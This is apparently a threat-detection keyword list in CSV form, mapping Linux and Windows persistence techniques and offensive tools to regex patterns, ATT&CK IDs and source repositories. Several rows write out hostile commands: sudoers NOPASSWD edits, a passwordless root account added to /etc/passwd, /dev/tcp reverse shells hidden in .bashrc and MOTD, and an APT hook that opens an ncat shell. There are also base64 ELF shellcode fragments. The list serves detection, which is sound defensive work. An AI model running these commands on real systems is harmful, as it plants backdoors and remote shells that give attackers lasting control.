"*ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3*",".{0,1000}ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*echo ""@RFGroenewoud""*",".{0,1000}echo\s\""\@RFGroenewoud\"".{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*echo ""Nothing to see here ... "" > /var/log/kern.log*",".{0,1000}echo\s\""Nothing\sto\ssee\shere\s\.\.\.\s\""\s\>\s\/var\/log\/kern\.log.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*echo * ALL=(ALL) NOPASSWD: ALL* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*echo * ALL=NOPASSWD: /bin/bash* >>/etc/sudoers*",".{0,1000}echo\s.{0,1000}\sALL\=NOPASSWD\:\s\/bin\/bash.{0,1000}\s\>\>\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudoers","use SUDO without password","T1548.002 - T1059.004 - T1078.004","TA0004 - TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","N/A","8","10","N/A","N/A","N/A","N/A"
"*echo *%sudo  ALL=(ALL) NOPASSWD: ALL* >> /etc/sudoers*",".{0,1000}echo\s.{0,1000}\%sudo\s\sALL\=\(ALL\)\sNOPASSWD\:\sALL.{0,1000}\s\>\>\s\/etc\/sudoers.{0,1000}","greyware_tool_keyword","sudo","Sudo Persistence via sudoers file","T1078 - T1166","TA0003","N/A","N/A","Persistence","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","10","10","1476","189","2025-01-23T14:44:33Z","2021-08-16T17:34:25Z"
"*echo *::0:0::/root:/bin/bash* >>/etc/passwd*",".{0,1000}echo\s.{0,1000}\:\:0\:0\:\:\/root\:\/bin\/bash.{0,1000}\s\>\>\/etc\/passwd.{0,1000}","greyware_tool_keyword","bash","add a passwordless user ","T1136.001 - T1059.004 - T1078.004","TA0005 - TA0002 - TA0004","N/A","N/A","Persistence","N/A","1","0","#linux","N/A","8","8","N/A","N/A","N/A","N/A"
"*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*",".{0,1000}echo\s.{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}nohup\sncat\s\-lvp\s.{0,1000}\s\-e\s\/bin\/bash\s.{0,1000}\s\>\s\/etc\/apt\/apt\.conf\.d\/.{0,1000}","greyware_tool_keyword","bash","Backdooring APT","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*",".{0,1000}echo\s.{0,1000}bash\s\-c\s.{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","greyware_tool_keyword","bash","Backdooring Message of the Day","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*echo > C:\inetpub\wwwroot\*\*.aspx*",".{0,1000}echo\s\>\sC\:\\inetpub\\wwwroot\\.{0,1000}\\.{0,1000}\.aspx.{0,1000}","greyware_tool_keyword","echo","writing an ASPX file to C:\inetpub\wwwroot\ (potential Web shell deployment)","T1505.003","TA0001 - TA0003","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a*",".{0,1000}edfc7e6329aeeb8cb0df8734ad9083840020e9d2d81d4ae71609dc7339552a0a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918*",".{0,1000}eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*",".{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63*",".{0,1000}ef1d610dd78efae3dfa2eebade2ee76882b7e2b5df140aa068e25519d800bc63.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*EgeBalci/WSAAcceptBackdoor*",".{0,1000}EgeBalci\/WSAAcceptBackdoor.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","1","N/A","N/A","10","2","111","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z"
"*Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All*",".{0,1000}Enable\-WindowsOptionalFeature\s\-Online\s\-FeatureName\sMicrosoft\-Hyper\-V\s\-All.{0,1000}","greyware_tool_keyword","powershell","enabling hyperV - virtualization could be abused by attacker to maintain persistence in a virtual machine","T1560.003 - T1547 - T1059","TA0003 - TA0002","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*Enable-WindowsOptionalFeature -Online:$true -FeatureName Microsoft-Hyper-V -All:$true*",".{0,1000}Enable\-WindowsOptionalFeature\s\-Online\:\$true\s\-FeatureName\sMicrosoft\-Hyper\-V\s\-All\:\$true.{0,1000}","greyware_tool_keyword","powershell","enabling hyperV - virtualization could be abused by attacker to maintain persistence in a virtual machine","T1560.003 - T1547 - T1059","TA0003 - TA0002","N/A","RagnarLocker ","Persistence","https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A"
"*Enumerating Administrators group, please wait*",".{0,1000}Enumerating\sAdministrators\sgroup,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*Enumerating new user, please wait*",".{0,1000}Enumerating\snew\suser,\splease\swait.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z"
"*esxcli system account add*",".{0,1000}esxcli\ssystem\saccount\sadd.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1098 - T1078 - T1078.003","TA0003 - TA0004","N/A","N/A","Persistence","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*esxcli system account set -i * -s t*",".{0,1000}esxcli\ssystem\saccount\sset\s\-i\s.{0,1000}\s\-s\st.{0,1000}","greyware_tool_keyword","esxcli","commands used by ransomware targeting ESXi hosts","T1098 - T1078 - T1078.003","TA0003 - TA0004","N/A","N/A","Persistence","https://medium.com/detect-fyi/detecting-and-responding-to-esxi-compromise-with-splunk-f33998ce7823","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*exec dropbear *",".{0,1000}exec\sdropbear\s.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","N/A","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*ExecStartPre present! ExecStartPre was modified!*",".{0,1000}ExecStartPre\spresent!\sExecStartPre\swas\smodified!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","150","15","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z"
"*F0005D08-6278-4BFE-B492-F86CCEC797D5*",".{0,1000}F0005D08\-6278\-4BFE\-B492\-F86CCEC797D5.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2*",".{0,1000}f0c4face818f1c021228c140e453fc43b214141ed0273bce57be44cae6461bb2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88*",".{0,1000}f0e1e5a2b52773889dc1e7c44c5a80716a0dd98beee46b705748773e292e1d88.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#filehash #linux","N/A","10","10","1911","439","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642*",".{0,1000}f0fc4517a1a74f1922e41886cc4584c7683f7726111e40f03b26edc6bd9c6642.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5*",".{0,1000}f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiiAAAA8AAAAAcAAAAAEAAAMdv341NDU2oCieGwZs2AW15SaAIAIylqEFFQieFqZljNgIlBBLMEsGbNgEOwZs2Ak1lqP1jNgEl5.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP*",".{0,1000}f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAzgAAAAAAAAAkAQAAAAAAAAAQAAAAAAAAailYmWoCX2oBXg8FSJdSxwQkAgAjKUiJ5moQWmoxWA8FajJYDwVIMfZqK1gPBUiXagNeSP.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#base64 #linux","N/A","8","6","507","53","2025-01-03T11:11:13Z","2024-05-19T12:37:40Z"
"*f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845*",".{0,1000}f116626cb8bd2787d19bbb0dbf578cbd09093e19ab27911beb1f61d46abb3845.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f118a70fa7b02b858bb4fffb96d9a861e4b02f62df054a0d69854449682c8f85*",".{0,1000}f118a70fa7b02b858bb4fffb96d9a861e4b02f62df054a0d69854449682c8f85.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22*",".{0,1000}f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f1a3a780227dec46aa938096d1a8d8f6240e711d757a25aaec0f6c6adf0a495a*",".{0,1000}f1a3a780227dec46aa938096d1a8d8f6240e711d757a25aaec0f6c6adf0a495a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d*",".{0,1000}f236aee384d7a0fab7fc186454ee6adb83b756843ecf75ec14b3df826a66ff1d.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*f34befa3856ca7fedc2081903e35dff0eb86147aa6e163169355e46f8d5c3c98*",".{0,1000}f34befa3856ca7fedc2081903e35dff0eb86147aa6e163169355e46f8d5c3c98.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","781","107","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z"
"*f38ff305cbb6d9d05b5285fba66bb37817e13986ec3b61acf190b9fd3d903e82*",".{0,1000}f38ff305cbb6d9d05b5285fba66bb37817e13986ec3b61acf190b9fd3d903e82.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef*",".{0,1000}f3b5e0f54f1da134c5d3c135f5be8ae7e85e499e8e73fabf87ffe010c23749ef.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd*",".{0,1000}f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2190","361","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z"
"*f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7*",".{0,1000}f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219*",".{0,1000}f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a*",".{0,1000}f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b*",".{0,1000}f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0*",".{0,1000}f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f930268ff8e01585865f3190c10570175b0ef11c1b17172c93b413df8507bcbe*",".{0,1000}f930268ff8e01585865f3190c10570175b0ef11c1b17172c93b413df8507bcbe.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a*",".{0,1000}f93389056fa9ad53e214a468aa495adcb2ff1b75a64cd7df77a63a173066d05a.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","85","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z"
"*fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba*",".{0,1000}fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*fa769dac7a0a94ee47d8ebe021eaba9e*",".{0,1000}fa769dac7a0a94ee47d8ebe021eaba9e.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","N/A","default password md5","10","4","360","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*FakeAMSI.c*",".{0,1000}FakeAMSI\.c.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117  - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3284","538","2025-01-21T05:52:54Z","2019-06-29T13:22:36Z"
"*FakeAMSI.dll*",".{0,1000}FakeAMSI\.dll.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117  - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3284","538","2025-01-21T05:52:54Z","2019-06-29T13:22:36Z"
"*FakeAMSI.exe*",".{0,1000}FakeAMSI\.exe.{0,1000}","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117  - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","N/A","10","3284","538","2025-01-21T05:52:54Z","2019-06-29T13:22:36Z"
